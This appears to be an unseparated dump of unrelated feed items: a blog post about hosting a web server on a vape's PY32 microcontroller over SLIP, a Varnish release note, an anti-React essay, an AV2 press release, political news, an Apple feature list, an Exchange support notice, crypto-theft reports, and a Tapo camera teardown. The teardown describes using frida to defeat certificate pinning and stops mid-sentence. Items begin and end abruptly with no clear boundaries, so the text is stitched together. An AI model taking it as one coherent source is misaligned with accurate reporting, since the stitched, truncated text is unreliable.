Last year, I was tearing apart some of these fancier pacifiers for adults when I noticed something that caught my eye: instead of the expected black blob of goo hiding some ASIC (Application Specific Integrated Circuit), I saw a little integrated circuit inscribed "PUYA".
I don’t blame you if this name doesn’t excite you as much it does me, most people have never heard of them. They are most well known for their flash chips, but I first came across them after reading Jay Carlson’s blog post about
the cheapest flash microcontroller you can buy
. They are quite capable little ARM Cortex-M0+ micros.
Over the past year I have collected quite a few of these PY32 based vapes, all of them from different models of vape from the same manufacturer. It’s not my place to do free advertising for big tobacco, so I won’t mention the brand I got it from, but if anyone who worked on designing them reads this, thanks for labeling the debug pins!
The chip is marked
PUYA C642F15
, which wasn’t very helpful. I was pretty sure it was a
PY32F002A
, but after poking around with
pyOCD
, I noticed that the flash was 24k and we have 3k of RAM. The extra flash meant that it was more likely a
PY32F002B
, which is actually a very different chip.
1
So here are the specs of a microcontroller so
bad
, it’s basically disposable:
24 MHz Cortex-M0+
24KiB of Flash Storage
3KiB of Static RAM
a few peripherals, none of which we will use.
You may look at those specs and think that it’s not much to work with. I don’t blame you, a 10y old phone can barely load google, and this is about 100x slower. I on the other hand see a
blazingly
fast web server.
The idea of hosting a web server on a vape didn’t come to me instantly. In fact, I have been playing around with them for a while, but after writing my post on
semihosting
, the penny dropped.
If you don’t feel like reading that article, semihosting is basically syscalls for embedded ARM microcontrollers. You throw some values/pointers into some registers and call a breakpoint instruction. An attached debugger interprets the values in the registers and performs certain actions. Most people just use this to get some logs printed from the microcontroller, but they are actually bi-directional.
If you are older than me, you might remember a time before Wi-Fi and Ethernet, the dark ages, when you had to use dial-up modems to get online. You might also know that the ghosts of those modems still linger all around us. Almost all USB serial devices actually emulate those modems: a 56k modem is just a 57600 baud serial device. Data between some of these modems was transmitted using a protocol called SLIP (Serial Line Internet Protocol).
2
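SLIP framing itself is tiny, which is part of why it has survived everywhere. A sketch of the sender side (the constants are from RFC 1055; serial_putc is a stand-in for whatever byte-output routine the transport provides):
/* RFC 1055 SLIP framing constants */
#define SLIP_END     0xC0 /* frame delimiter */
#define SLIP_ESC     0xDB /* escape introducer */
#define SLIP_ESC_END 0xDC /* escaped END */
#define SLIP_ESC_ESC 0xDD /* escaped ESC */

extern void serial_putc(unsigned char c); /* stand-in byte-output routine */

void slip_send_packet(const unsigned char *p, int len) {
    serial_putc(SLIP_END); /* flush any stray line noise */
    while (len--) {
        unsigned char c = *p++;
        if (c == SLIP_END) {        /* END appears in the payload: escape it */
            serial_putc(SLIP_ESC);
            serial_putc(SLIP_ESC_END);
        } else if (c == SLIP_ESC) { /* so does ESC itself */
            serial_putc(SLIP_ESC);
            serial_putc(SLIP_ESC_ESC);
        } else {
            serial_putc(c);
        }
    }
    serial_putc(SLIP_END); /* mark end of frame */
}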
This may not come as a surprise, but Linux (and with some tweaking even macOS) supports SLIP. The
slattach
utility can make any
/dev/tty*
send and receive IP packets. All we have to do is put the data down the wire in the right format and provide a virtual tty.
This is actually easier than you might imagine: pyOCD can forward all semihosting through a telnet port. Then, we use
socat
to link that port to a virtual tty:
pyocd gdb -S -O semihost_console_type=telnet -T $(PORT) $(PYOCDFLAGS) &
socat PTY,link=$(TTY),raw,echo=0 TCP:localhost:$(PORT),nodelay &
sudo slattach -L -p slip -s 115200 $(TTY) &
sudo ip addr add 192.168.190.1 peer 192.168.190.2/24 dev sl0
sudo ip link set mtu 1500 up dev sl0
Ok, so we have a “modem”, but that’s hardly a web server. To actually talk TCP/IP, we need an IP stack. There are many choices, but I went with
uIP
because it’s pretty small, doesn’t require an RTOS, and it’s easy to port to other platforms.
It also, helpfully, comes with a very minimal HTTP server example.
After porting the SLIP code to use semihosting, I had a working web server…half of the time.
As with most highly optimised libraries, uIP was designed for 8- and 16-bit machines, which rarely have memory alignment requirements. On ARM, however, if you dereference a
u16 *
, you better hope that address is even, or you’ll get an exception. The
uip_chksum
assumed
u16
alignment, but the script that creates the filesystem didn’t.
I actually decided to modify the structure of the filesystem a bit to make it more portable.
This was my first time working with
perl
and I have to say, it’s quite well suited to this kind of task.
So how fast is a web server running on a disposable microcontroller? Well, initially, not very fast. Pings took ~1.5s with 50% packet loss and a simple page took over 20s to load. That's so bad, it's actually funny, and I kind of wanted to leave it there.
However, the problem was actually between the seat and the steering wheel the whole time. The first implementation read and wrote a single character at a time, which had a massive overhead associated with it. I previously benchmarked semihosting on this device, and I was getting ~20KiB/s, but uIP’s SLIP implementation was designed for very low memory devices, so it was serialising the data byte by byte.
We have a whopping 3kiB of RAM to play with, so I added a ring buffer to cache reads from the host and feed them into the SLIP poll function. I also split writes in batches to allow for escaping.
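The ring buffer itself is nothing exotic; a sketch of the shape I mean (the size and names are illustrative, not the project's actual code):
#define RB_SIZE 1024 /* power of two so wrap-around is a cheap mask */

static unsigned char rb_data[RB_SIZE];
static volatile unsigned rb_head, rb_tail; /* head: write index, tail: read index */

static int rb_put(unsigned char c) {
    unsigned next = (rb_head + 1) & (RB_SIZE - 1);
    if (next == rb_tail) return -1; /* full: drop or apply back-pressure */
    rb_data[rb_head] = c;
    rb_head = next;
    return 0;
}

static int rb_get(void) {
    if (rb_head == rb_tail) return -1; /* empty */
    unsigned char c = rb_data[rb_tail];
    rb_tail = (rb_tail + 1) & (RB_SIZE - 1);
    return c;
}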
Now this is what I call blazingly fast! Pings now take 20ms with no packet loss, and a full page loads in about 160ms. This was using almost all of the RAM, but I could also dial down the buffer sizes to leave more than enough headroom to run other tasks. The project repo has everything set to a nice balance of latency and RAM usage:
Memory region Used Size Region Size %age Used
FLASH: 5116 B 24 KB 20.82%
RAM: 1380 B 3 KB 44.92%
For this blog however, I paid for none of the RAM, so I’ll use all of the RAM.
As you may have noticed, we have just under 20kiB (80%) of storage space. That may not be enough to ship all of React, but as you can see, it’s more than enough to host this entire blog post.
And this is not just a static page server, you can run any server-side code you want, if you know C that is.
Just for fun, I added a JSON API endpoint to get the number of requests to the main page (since the last crash) and the unique ID of the microcontroller.
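With uIP's simple httpd, an endpoint like that boils down to formatting a buffer. A sketch of the shape of such a handler (the names, the counter, and the snprintf-based formatting are illustrative, not the exact project code):
#include <stdio.h>

static unsigned long page_hits; /* bumped on each main-page request; resets on crash */

/* Fill `out` with a small JSON body; the server sends it as the response. */
static int api_status_json(char *out, int outlen, const char *uid_hex) {
    return snprintf(out, outlen,
                    "{\"hits\":%lu,\"uid\":\"%s\"}",
                    page_hits, uid_hex);
}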
Version
8.0.0 of Varnish Cache
has been released. In addition to a number
of changes to varnishd parameters, the ability to access some
runtime parameters using the Varnish Configuration Language, and other
improvements, 8.0.0 comes with big news; the project is forming an
organization called a fore...
In addition to a number of changes to varnishd parameters, the ability to access some
runtime parameters using the Varnish Configuration Language, and other
improvements, 8.0.0 comes with
big news
; the project is forming an
organization called a
forening
that will set out formal governance for the project.
The move also comes with a name change due to legal difficulties in
securing the Varnish Cache name:
The new association and the new project will be named "The Vinyl
Cache Project", and this release 8.0.0, will be the last under the
"Varnish Cache" name. The next release, in March will be under the new
name, and will include compatibility scripts, to make the transition as
smooth as possible for everybody.
I want to make it absolutely clear that this is 100% a mess of my
making: I should have insisted on a firm written agreement about the
name sharing, but I did not.
I will also state for the record, that there are no hard feelings
between Varnish Software and the FOSS project.
Varnish Software has always been, and still is, an important and
valued contributor to the FOSS project, but sometimes even friends can
make a mess of a situation.
React Won by Default – and It's Killing Front End Innovation
React didn’t win purely on technical merit. It won by default. That default is now slowing innovation across the frontend ecosystem.
When teams need a new frontend, the conversation rarely starts with “What are the constraints and which tool best fits them?” It often starts with “Let’s use React; everyone knows React.” That reflex creates a self-perpetuating cycle where network effects, rather than technical fit, decide architecture.
Meanwhile, frameworks with real innovations struggle for adoption. Svelte compiles away framework overhead. Solid delivers fine-grained reactivity without virtual-DOM tax. Qwik achieves instant startup via resumability. These approaches can outperform React’s model in common scenarios, but they rarely get a fair evaluation because React is chosen by default.
React is excellent at many things. The problem isn’t React itself, it’s the React-by-default mindset.
The Innovation Ceiling
React’s technical foundations explain some of today’s friction. The virtual DOM was a clever solution for 2013’s problems, but as Rich Harris outlined in
“Virtual DOM is pure overhead”
, it introduces work modern compilers can often avoid.
Hooks addressed class component pain but introduced new kinds of complexity: dependency arrays, stale closures, and misused effects. Even React’s own docs emphasize restraint:
“You Might Not Need an Effect”
. Server Components improve time-to-first-byte, but add architectural complexity and new failure modes.
The
React Compiler
is a smart solution that automates patterns like
useMemo
/
useCallback
. Its existence is also a signal: we’re optimizing around constraints baked into the model.
Contrast this with alternative approaches: Svelte 5’s
Runes
simplify reactivity at compile time; Solid’s
fine-grained reactivity
updates exactly what changed; Qwik’s
resumability
eliminates traditional hydration. These aren’t incremental tweaks to React’s model—they’re different models with different ceilings.
Innovation without adoption doesn’t change outcomes. Adoption can’t happen when the choice is made by reflex.
The Technical Debt We’re All Carrying
Defaulting to React often ships a runtime and reconciliation cost we no longer question. Even when it’s fast enough, the ceiling is lower than compile-time or fine-grained models. Developer time is spent managing re-renders, effect dependencies, and hydration boundaries instead of shipping value. The broader lesson from performance research is consistent: JavaScript is expensive on the critical path (
The Cost of JavaScript
).
We’ve centered mental models around “React patterns” instead of web fundamentals, reducing portability of skills and making architectural inertia more likely.
The loss isn’t just performance, it’s opportunity cost when better-fit alternatives are never evaluated. For instance, benchmarks like the
JS Framework Benchmark
show alternatives like Solid achieving up to 2-3x faster updates in reactivity-heavy scenarios compared to React.
The Frameworks Being Suffocated
Svelte: The Compiler Revolution
Svelte shifts work to compile time: no virtual DOM, minimal runtime. Components become targeted DOM operations. The mental model aligns with web fundamentals.
But “not enough jobs” keeps Svelte adoption artificially low despite its technical superiority for most use cases. Real-world examples, like The Guardian’s adoption of Svelte for their frontend, demonstrate measurable gains in performance and developer productivity, with reported reductions in bundle sizes and faster load times. For instance, as detailed in
Wired’s article on Svelte
, developer Shawn Wang (
@swyx
on X/Twitter) reduced his site's size from 187KB in React to just 9KB in Svelte by leveraging its compile-time optimizations, which shift framework overhead away from runtime. This leads to faster, more efficient apps, especially on slow connections.
Solid: The Reactive Primitive Approach
Solid delivers fine-grained reactivity with JSX familiarity. Updates flow through signals directly to affected DOM nodes, bypassing reconciliation bottlenecks. Strong performance characteristics, limited mindshare. As outlined in Solid’s
comparison guide
, this approach enables more efficient updates than React’s virtual DOM, with precise reactivity that minimizes unnecessary work and improves developer experience through simpler state management.
While prominent case studies are scarcer than for more established frameworks, this is largely due to Solid’s lower adoption. Yet anecdotal reports from early adopters suggest similar transformative gains in update efficiency and code simplicity, waiting to be scaled and shared as more teams experiment.
Qwik: The Resumability Innovation
Qwik uses resumability instead of hydration, enabling instant startup by loading only what the current interaction needs. Ideal for large sites, long sessions, or slow networks. According to Qwik’s
Think Qwik guide
, this is achieved through progressive loading and serializing both state and code. Apps can thus resume execution instantly without heavy client-side bootstrapping, resulting in superior scalability and reduced initial load times compared to traditional frameworks.
Success stories for Qwik may be less visible simply because fewer teams have broken from defaults to try it. But those who have report dramatic improvements in startup times and resource efficiency, indicating a wealth of untapped potential if adoption grows.
All three are under-adopted not for lack of merit, but because the default choice blocks trying them out.
Furthermore, React’s API surface area is notably larger and more complex than its alternatives, encompassing concepts like hooks, context, reducers, and memoization patterns that require careful management to avoid pitfalls. This expansive API contributes to higher cognitive load for developers, often leading to bugs from misunderstood dependencies or over-engineering. For example, in Cloudflare’s
September 12, 2025 outage
, a useEffect hook with a problematic dependency array triggered repeated API calls, overwhelming their Tenant Service and causing widespread failures. In contrast, frameworks like Svelte, Solid, and Qwik feature smaller, more focused APIs that emphasize simplicity and web fundamentals, reducing the mental overhead and making them easier to master and maintain.
The Network Effect Prison
React’s dominance creates self-reinforcing barriers. Job postings ask for “React developers” rather than “frontend engineers,” limiting skill diversity. Component libraries and team muscle memory create institutional inertia.
Risk-averse leaders choose the “safe” option. Schools teach what jobs ask for. The cycle continues independent of technical merit.
That’s not healthy competition; it’s ecosystem capture by default.
Breaking the Network Effect
Escaping requires deliberate action at multiple levels. Technical leaders should choose based on constraints and merits, not momentum. Companies can allocate a small innovation budget to trying alternatives. Developers can upskill beyond a single mental model.
Educators can teach framework-agnostic concepts alongside specific tools. Open source contributors can help alternative ecosystems mature.
Change won’t happen automatically. It requires conscious choice.
Framework Evaluation Checklist
To make deliberate choices, use this simple checklist when starting a new project:
Assess Performance Needs
: Evaluate metrics like startup time, update efficiency, and bundle size. Prioritize frameworks with compile-time optimizations if speed is critical.
Team Skills and Learning Curve
: Consider existing expertise but factor in migration paths; many alternatives offer gentle ramps (e.g., Solid’s JSX compatibility with React).
Scaling and Cost of Ownership
: Calculate long-term costs, including maintenance, dependency management, and tech debt. Alternatives often reduce runtime overhead, lowering hosting costs and improving scalability.
Ecosystem Fit
: Balance maturity with innovation; pilot in non-critical areas to test migration feasibility and ROI.
The Standard Counter‑Arguments
“But ecosystem maturity!”
Maturity is valuable, and can also entrench inertia. Age isn’t the same as fitness for today’s constraints.
Additionally, a mature ecosystem often means heavy reliance on third-party packages, which can introduce maintenance burdens like keeping dependencies up-to-date, dealing with security vulnerabilities, and bloating bundles with unused code. While essential in some cases, this flexibility can lead to over-dependence; custom solutions tailored to specific needs are often leaner and more maintainable in the long run. Smaller ecosystems in alternative frameworks encourage building from fundamentals, fostering deeper understanding and less technical debt. Moreover, with AI coding assistants now able to generate precise, custom functions on demand, the barrier to creating bespoke utilities has lowered dramatically. This makes it feasible to avoid generic libraries like lodash or date libraries like Moment or date-fns entirely in favor of lightweight, app-specific implementations.
“But hiring!”
Hiring follows demand. You can de‑risk by piloting alternatives in non‑critical paths, then hiring for fundamentals plus on‑the‑job training.
“But component libraries!”
Framework‑agnostic design systems and Web Components reduce lock-in while preserving velocity.
“But stability!”
React’s evolution from classes to hooks to Server Components demonstrates constant churn, not stability.
Alternative frameworks often provide more consistent APIs.
“But proven at scale!”
jQuery was proven at scale too. Past
success doesn’t guarantee future relevance.
The Broader Ecosystem Harm
Monoculture slows web evolution when one framework’s constraints become de facto limits. Talent spends cycles solving framework-specific issues rather than pushing the platform forward. Investment follows incumbents regardless of technical merit.
Curricula optimize for immediate employability over fundamentals, creating framework-specific rather than transferable skills. Platform improvements get delayed because “React can handle it” becomes a default answer.
The entire ecosystem suffers when diversity disappears.
The Garden We Could Grow
Healthy ecosystems require diversity, not monocultures. Innovation emerges when different approaches compete and cross-pollinate. Developers grow by learning multiple mental models. The platform improves when several frameworks push different boundaries.
Betting everything on one model creates a single point of failure. What happens if it hits hard limits? What opportunities are we missing by not exploring alternatives?
It’s time to choose frameworks based on constraints and merit rather than momentum. Your next project deserves better than React-by-default. The ecosystem deserves the innovation only diversity can provide.
Stop planting the same seed by default. The garden we could cultivate through diverse framework exploration would be more resilient and more innovative than the monoculture we’ve drifted into.
The choice is ours to make.
AOMedia Announces Year-End Launch of Next-Gen Video Codec AV2
The Future of Innovation Is Open: AOMedia Member Survey Highlights Adoption Trends
Wakefield, Mass. — Sept. 15, 2025 — The Alliance for Open Media (AOMedia), a global collaboration of innovators working together to define and deploy open standards that power the next generation of media experiences, today announced the upcoming launch of the next evolution in open video coding: AV2. Set for a year-end release, AV2 is not only an upgrade to the widely adopted AV1 but also a foundational piece of AOMedia’s future tech stack.
AV2, a generation leap in open video coding and the answer to the world’s growing
streaming demands, delivers significantly better compression performance than
AV1. AV2 provides enhanced support for AR/VR applications, split-screen delivery
of multiple programs, improved handling of screen content, and an ability to
operate over a wider visual quality range. AV2 marks a milestone on the path to
an open, innovative future of media experiences.
“At AOMedia, we believe innovation thrives when it’s open,” said Dr.
Pierre-Anthony Lemieux, Executive Director of AOMedia. “Our standards benefit
from input from innovators worldwide and are developed under a royalty-free
patent policy, bringing next-generation media experiences to more people, faster.
We’re excited to share AV2 with the world, as we continue to lead the way in
shaping the future of media through open collaboration.”
Survey Findings: Widespread Support of AV1 and Planned Adoption of AV2
In conjunction with its 10th anniversary, AOMedia released new member survey
findings that underscore strong industry-wide support for its open innovation
model and the widespread adoption of its technologies.
The survey found that 88% of members ranked AV1 as either “extremely critical”
or “important” to their current or future product roadmaps. AOMedia’s
Adoption Showcase
illustrates the real-world benefits members are achieving through AV1 deployment.
Looking ahead, 53% of AOMedia members surveyed plan to adopt AV2 within 12 months of its finalization later this year, with 88% expecting to implement it within the next two years.
AOMedia invites new members to help shape the future of open, high-performance
media standards. To learn more about membership opportunities, contact
membership@aomedia.org
.
Launched in 2015, the Alliance for Open Media (AOMedia) develops open standards
for media — spanning video, audio, still images, and immersive technologies.
AOMedia brings together 49 global innovators — including tech leaders with
decades of media tech experience and some of the world’s largest patent
holders — to support this mission. Its steering committee consists of Amazon,
Apple, Cisco, Google, Intel, Meta, Microsoft, Mozilla, Netflix, NVIDIA, Samsung
Electronics, and Tencent. Learn more at
www.aomedia.org
.
Media Contact
Melissa Bednar
AOMedia Public Relations
mbednar@virtualinc.com
781.876.8962
GOP Rep. Backtracks on Bill That Could Let Marco Rubio Revoke Passports From Israel Critics
Intercept
theintercept.com
2025-09-15 18:34:45
The bill alarmed civil liberties advocates who feared Rubio could use it to punish pro-Palestine Americans.
The post GOP Rep. Backtracks on Bill That Could Let Marco Rubio Revoke Passports From Israel Critics appeared first on The Intercept....
A top Republican
lawmaker in the House of Representatives is backtracking on a proposal that would have given Secretary of State Marco Rubio the power to revoke American citizens’ passports if he decides they have provided “material support” to terrorists.
The proposal from Rep. Brian Mast, R-Fla., sparked a backlash from civil society groups after he introduced it as part of a larger State Department reorganization bill last week.
On Sunday, Mast
introduced a manager’s amendment
that would strip the provision from the bill he introduced days before. The manager’s amendment itself must still be approved at a Wednesday hearing to apply to the larger House bill, which itself faces an uncertain future in the Senate.
Civil liberties supporters celebrated Monday, after warning last week that the bill endangered the right to travel freely.
One advocate had warned
that it essentially granted the secretary of state “thought police” power.
“It’s a really great thing that this provision got struck,” said Kia Hamadanchy, an attorney with the American Civil Liberties Union. “It was hugely problematic, created a huge risk of abuse, of politicized enforcement.”
Mast’s office did not immediately respond to a request for comment.
Under Mast’s original proposal, the secretary of state would have been empowered to refuse or revoke passports of people they deem to have materially supported terrorists.
Mast’s amendment would also remove a provision that would allow the secretary of state to revoke passports for people who have been convicted or charged of material support of designated terror groups.
Magnifier lets you zoom in on your surroundings using a connected camera. Accessibility Reader provides a systemwide, customized reading and listening experience. Braille Access creates an all-new interface for braille displays.
And Vehicle Motion Cues help reduce motion sickness in moving vehicles.
Family.
Parents can take advantage of a wide set of parental controls designed to keep children safe. These include new enhancements across Communication Limits, Communication Safety, and the App Store.
Journal.
Now on Mac for the most comfortable writing experience, Journal makes it easy to capture and write about everyday moments and special events using photos, videos, audio recordings, places, and more.
Photos.
An updated design lets you quickly access filtering and sorting options and customize the size of Collections tiles so you can view your library just how you like. And with Pinned Collections, you can keep your most-visited ones right at your fingertips.
FaceTime.
Celebrate the people who matter most with a new tiled design that features beautiful and personalized Contact Posters.
Reminders.
With Apple Intelligence, Reminders can suggest tasks, grocery items, and follow-ups based on emails or other text on your device. It can also automatically categorize related reminders into sections within a list.
Games.
The new Games app brings together all the games you have on your Mac. In the Game Overlay, you can adjust system settings, chat with friends, or invite them to play — all without leaving the game. And for developers, Metal 4 brings even more advanced graphics and rendering technologies, like MetalFX Frame Interpolation and Denoising.
Messages.
Create polls and personalize conversations with backgrounds. Redesigned conversation details feature designated sections for contact info, photos, links, location, and more. Typing indicators in groups let you know exactly who is about to chime in. Screening tools detect spam and give you control. And the Add Contact button now appears next to an unknown number in a group.
Passwords.
Easily refer to changes you’ve made to your accounts. Find previous versions of passwords, along with when they were changed.
Notes.
Capture conversations in the Phone app as audio recordings with transcriptions.
You can also export a note into a Markdown file.
Microsoft: Exchange 2016 and 2019 reach end of support in 30 days
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 18:04:05
Microsoft has reminded administrators again that Exchange 2016 and Exchange 2019 will reach the end of extended support next month and has provided guidance for decommissioning outdated servers. [...]...
Microsoft has reminded administrators again that Exchange 2016 and Exchange 2019 will reach the end of extended support next month and has provided guidance for decommissioning outdated servers.
According to the company's product lifecycle website, Exchange 2016 reached its mainstream support end date in October 2020, while Exchange 2019's mainstream support ended on January 9, 2024.
Microsoft
also reminded
customers in January that Exchange Server 2016 and 2019 will reach the end of support in October.
After October 14, Microsoft will cease providing technical support, including bug fixes for newly discovered issues that may impact the usability and stability of outdated servers.
The company will also stop issuing time zone updates and security fixes for vulnerabilities that may expose servers to security breaches.
"On October 14, 2025, one month from now, Exchange Server 2016 and Exchange Server 2019 will reach end of support. It's critical to upgrade now to remain supported and secure," the Exchange Server engineering team
warned
over the weekend.
"Customer installations of Exchange 2016 and Exchange 2019 will continue to run after October 14, 2025. However, continuing to use these offerings after the end-of-support date invites potential security risks, so we strongly recommend taking action now."
Admins can
perform an in-place upgrade
from Exchange Server 2019 to Exchange Server SE, with the process being identical to installing a Cumulative Update (CU).
Those who still have servers running Exchange 2016 and 2013 are advised to upgrade to Exchange Server SE or first install Exchange 2019, respectively.
"If you are running Exchange 2016, we recommend that you perform a legacy (a.k.a. side-by-side) upgrade to Exchange Server SE and do an in-place upgrade to Exchange Server SE when it is available," Microsoft added.
" If you still have Exchange Server 2013 or earlier in your organization, you must first remove it before you can install Exchange Server 2019 CU15 or upgrade to Exchange Server SE."
Kathy Hochul Endorsed Zohran Mamdani. Will Top Democrats Join Her?
Intercept
theintercept.com
2025-09-15 18:01:30
The New York governor’s support for Mamdani marked a shift in the NYC mayoral race — but top Democrats like Chuck Schumer and Hakeem Jeffries still haven’t weighed in.
The post Kathy Hochul Endorsed Zohran Mamdani. Will Top Democrats Join Her? appeared first on The Intercept....
New York Gov.
Kathy Hochul became the top official in the state to endorse Assembly Member Zohran Mamdani for New York City mayor on Sunday, marking a shift for a
strident defender of Israel
as mainstream Democrats grapple with
surging public support
for Mamdani’s criticism of the Israeli regime over its ongoing genocide in Gaza.
In an
opinion piece
for the New York Times, Hochul wrote that she and Mamdani shared priorities like making the city more affordable and ensuring strong leadership of the New York Police Department. She also took an oblique shot at Mamdani’s two main competitors: current New York City Mayor Eric Adams, who President Donald Trump’s team has
reportedly pushed
to drop out of the race, and Andrew Cuomo, who would have a better shot at winning if Adams did so. The former governor lost the Democratic primary by just under 13 percentage points
to Mamdani in June.
“In light of the abhorrent and destructive policies coming out of Washington every day, I needed to know the next mayor will not be someone who would surrender one inch to President Trump,” Hochul wrote. Trump,
apparently displeased
with the endorsement, called it “a rather shocking development.”
Hochul’s support for Mamdani followed nearly three months of
hand-wringing
from the de facto leader of New York’s Democratic Party, who has expressed skepticism of Mamdani’s policy proposals that would require tax hikes on the wealthy and more public spending. Now, Hochul’s endorsement sets her apart from the top two Democrats in Congress — Senate Minority Leader Chuck Schumer and House Minority Leader Hakeem Jeffries — who have both declined to weigh in on the most heated race in New York City.
As a result, New York’s Democratic establishment remains split over whether they should rally behind Mamdani, Cuomo, or — seemingly – no one.
Nearly three months after the primary, only four members of the Democratic congressional delegation representing New York City districts have endorsed Mamdani: Reps. Nydia Velázquez, Alexandria Ocasio-Cortez, Jerry Nadler, and Adriano Espaillat. Only Velázquez and Ocasio-Cortez backed Mamdani before his primary win.
“We have a Democratic nominee,” Ocasio-Cortez told
reporters earlier this month
. “Are we a party that rallies behind their nominee, or not?”
Democratic Reps.
George Latimer
, Ritchie Torres, Gregory Meeks, and Tom Suozzi have endorsed Cuomo. Sen. Kirsten Gillibrand and Reps. Dan Goldman, Grace Meng, and Yvette Clarke have not made endorsements in the race.
Urging her fellow New York Democrats to back Mamdani, Ocasio-Cortez has pointed to her support of President Joe Biden during the 2024 presidential election even though he was not her preferred candidate.
“We use our primaries to settle our differences and once we have a nominee, we rally behind that nominee. I am very concerned by the example that is being set by anybody in our party,” Ocasio-Cortez said
earlier this month
. “If an individual doesn’t want to support the party’s nominee now, it complicates their ability to ask voters to support any nominee later.”
Outside the city, Rep. Pat Ryan, a Democrat who represents a swing district in the Hudson Valley, endorsed Mamdani last week. Democratic Rep. Laura Gillen, a moderate from Long Island, was the first Democrat to publicly
denounce
Mamdani’s campaign after his win but has not endorsed a candidate in the race.
Reached for comment, a spokesperson for Jeffries pointed to a
statement
he made to reporters last week: “I certainly will have more to say about the New York City mayor’s race in short order.”
Offices for Schumer, Gillibrand, Goldman, Meng, and Clarke did not immediately respond to requests for comment.
Nadler, who announced this month he will retire at the end of the current congressional session, addressed his change of heart toward Mamdani during an
interview
with WNYC’s Brian Lehrer on September 5. During the primary, Nadler said he would not back Mamdani because of his criticism of Israel’s genocide in Gaza and what Nadler called Mamdani’s lack of experience. Nadler told Lehrer his decision to endorse Mamdani after he won the primary was a no-brainer.
“First, he was the Democratic nominee,” Nadler said. “Second, what are the alternatives? You have the mayor, who’s a crook, and you had Andrew Cuomo, whom I had said should resign from the governorship because he was a repeat sexual predator.”
Goldman, whose
Manhattan district
Mamdani won in June, endorsed state Sen. Zellnor Myrie before the primary and has said he has spoken with Mamdani but
won’t endorse him
without “concrete steps” to assuage fears from Jewish New Yorkers about hate crimes in the city. It’s not clear what further steps Goldman wants to see — Mamdani has
repeatedly said
he takes concerns about antisemitism seriously and that he would take steps to protect all of his constituents — Jewish and otherwise.
Clarke endorsed New York City Council Speaker Adrienne Adams before the primary. Meng, who
did not make an endorsement
prior to the primary,
congratulated
Mamdani on his win in June and a campaign that she said “built coalitions & mobilized underrepresented New Yorkers!” But she stopped short of endorsing Mamdani.
Gustavo Gordillo, co-chair of the New York City Democratic Socialists of America, which supports Mamdani’s campaign, condemned the party establishment for neglecting to rally behind Mamdani.
“Establishment Democrats have no plan to support the workers targeted by Trump’s agenda,” Gordillo said. “If establishment Democrats refuse to get behind Zohran, they’re not just rejecting the vision of an affordable NYC — they’re rejecting the 500,000 voters and counting who are behind Zohran.”
Thorchain founder exploited for $1.35 million
Web3 Is Going Great
web3isgoinggreat.com
2025-09-15 17:47:00
John-Paul Thorbjornsen, the founder of Thorchain and Vultisig, suffered a wallet drain, reportedly after experiencing a video meeting scam from an attacker who had exploited the Telegram account belonging to one of his friends. According to JP, the scammer used a malicious video call link t...
John-Paul Thorbjornsen, the founder of Thorchain and Vultisig, suffered a wallet drain, reportedly after experiencing a video meeting scam from an attacker who had exploited the Telegram account belonging to one of his friends. According to JP, the scammer used a malicious video call link to place malware on his computer, which then exfiltrated private keys for one of his crypto wallets. Some questioned whether he had made up the story, as he immediately began using it to promote his Vultisig product.
Later that week, Thorbjornsen apparently suffered another loss — this one confirmed on-chain to be around $1.35 million.
According to crypto sleuth zachxbt, the attackers appeared to be a part of North Korean crypto hacking operations. "JP is one of the people whose has greatly benefited financially from the laundering of DPRK hacks/exploits. So it’s a bit poetic he got rekt here by DPRK," he wrote.
Shibarium bridge hit with $2.4 million flash loan attack
Web3 Is Going Great
web3isgoinggreat.com
2025-09-15 17:31:48
A bridge for Shibarium, the layer-2 network for the Shiba Inu project, was exploited for approximately $2.4 million in funds. The attacker bought 4.6 million BONE tokens (the governance token for Shibarium) using a flash loan, then used compromised validator signing keys to take control of ...
A bridge for Shibarium, the layer-2 network for the Shiba Inu project, was exploited for approximately $2.4 million in funds. The attacker bought 4.6 million BONE tokens (the governance token for Shibarium) using a flash loan, then used compromised validator signing keys to take control of the majority of validator power. Then, they used that control to drain around 225 ETH and 92.6 billion SHIB, together priced at around $2.4 million at the time of the theft.
The project has paused staking on the network, freezing the BONE tokens borrowed by the attacker, which may limit the attacker's profits.
I recently bought a cheap Tapo indoor camera to see what my dog gets up to when I am out of the house.
What actually followed? I ended up reverse-engineering onboarding flows, decompiling an APK, MITMing TLS sessions, and writing cryptographic scripts.
My main motivation for this project really stemmed from the fact that the camera annoyed me from day one. Setting the camera up in frigate was quite painful; no one online really seemed to know how these cameras worked.
SIDENOTE: If you want 2 way audio to work in frigate you must use the
tapo://
go2rtc configuration for your main stream instead of the usual
rtsp://
. TP-Link are lazy and only implement 2 way audio on their own proprietary API.
One undocumented behavior that tripped me up was that the device’s API is supposed to accept credentials
admin
:
<your-tapo-cloud-password>
after onboarding. However after banging my head against a wall for a few hours I later discovered that if you change your cloud password after onboarding, paired devices don’t get the memo 🙂.
This implied a few things to me that started the cogs turning:
There must be a call made during on-boarding that syncs the device password with the cloud password
The device must either allow unauthenticated calls before this step or have some sort of default password.
So considering my onboarding woes and the fact that I was starting to recoil every time the tapo app tried to jam a “Tapo Care” subscription down my throat, a cloudless onboarding solution for the device was beginning to look more and more desirable.
The first step to cracking this egg was to be able to snoop on what the app and the camera are saying to each other during onboarding. That is, establish a man in the middle.
Man in the middle
To man in the middle a phone app, you must be able to route all http(s) traffic via a proxy server you control. Historically this has been quite simple to achieve, simply spin up a proxy on a computer, add the proxy’s self-signed certificate to the phone’s truststore, and configure the phone to point at the proxy.
However, modern phone apps can use a few nasty tricks to render this approach ineffective. Namely, they will blatantly ignore proxies, throw the system truststore to the wind and make liberal use of certificate pinning.
The most foolproof technique for generically MITMing an app has therefore become dynamic instrumentation via tools like
frida
. What this allows us to do is force an app to use the proxies and certificates that we tell it to whilst batting aside its attempts to do things like certificate pinning.
So the setup ended up looking like this (full setup guide
here
):
---
config:
theme: 'base'
themeVariables:
primaryColor: '#00000000'
primaryTextColor: '#fff'
primaryBorderColor: '#ffffff8e'
lineColor: '#fff'
secondaryColor: '#fff'
tertiaryColor: '#fff'
---
sequenceDiagram
participant A as Tapo App <br>(with frida hooks)
participant L as Laptop <br>(mitmproxy)
participant C as Tapo Camera
A->>L: Request
L->>L: Record request
L->>C: Forward request
C-->>L: Response
L->>L: Record response
L-->>A: Forward response
After spinning up
mitmproxy
, injecting the
frida scripts
, and onboarding the camera, we finally see an initial login flow — before the admin password ever gets changed:
Searching for
"admin"
in JADX gives us many hits but there are a few concentrated in a
CameraOnboardingViewModel
class that look interesting:
The function
m98131y2
appears to be returning a password that is then passed to the
new Account()
